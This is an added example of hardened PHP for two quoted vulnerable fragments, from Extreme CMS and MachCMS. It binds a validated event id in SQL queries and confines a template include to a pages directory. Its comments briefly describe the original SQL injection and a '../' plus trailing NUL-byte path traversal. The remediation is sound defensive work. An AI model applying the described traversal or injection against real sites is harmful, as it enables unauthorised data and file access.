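A hardened counterpart to the two fragments quoted in this post, added here as an example and not taken from Extreme CMS, MachCMS, or the post's author: the calendar lookup with the event id validated and bound as a query parameter, and a page-name check for the template include. It assumes a mysqli connection (with mysqlnd) in $db and the table and column names used in the quoted code.

```php
<?php
// Added example, not project code. Assumes: $db is a mysqli connection, the
// calendar table has integer id and ev_dat (YYYY-MM-DD) columns, pages live
// under a pages/ directory exactly as in the quoted Template.php.

// --- Extreme CMS calendar/show.php ---------------------------------------
// The original interpolated $_GET['event'] straight into the query string.
// Reject anything that is not a positive integer before it reaches SQL, then
// bind it, so the value can never alter the structure of the statement.
function fetch_event(mysqli $db, $raw_event): ?array
{
    $id = filter_var($raw_event, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // caller shows "no such event" instead of running a query
    }
    $stmt = $db->prepare("SELECT id, ev_dat FROM calendar WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// The second query reused ev_dat from the first result. A value read back
// from the database is still untrusted data, so it is validated and bound too.
function fetch_events_on_date(mysqli $db, string $ev_dat): array
{
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $ev_dat)) {
        return [];
    }
    $stmt = $db->prepare("SELECT id, ev_dat FROM calendar WHERE ev_dat = ?");
    $stmt->bind_param('s', $ev_dat);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// --- MachCMS classes/Template.php -----------------------------------------
// The original passed $page (from ?q=) into require_once(), so "../" and a
// trailing %00 walked out of pages/. Accept only a plain page name, then
// confirm the resolved path is still inside the pages directory.
function resolve_page_file(string $pages_dir, string $page): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $page)) {
        return null; // rejects "../", NUL bytes and anything else not a page name
    }
    $candidate = realpath("$pages_dir/$page.page/main.php");
    $base = realpath($pages_dir);
    if ($candidate === false || $base === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // missing page, or resolved outside pages/
    }
    return $candidate;
}
```

resolve_page_file() returns null for both "missing" and "outside pages/", so the caller renders the same not-found page in either case and leaks nothing about the filesystem.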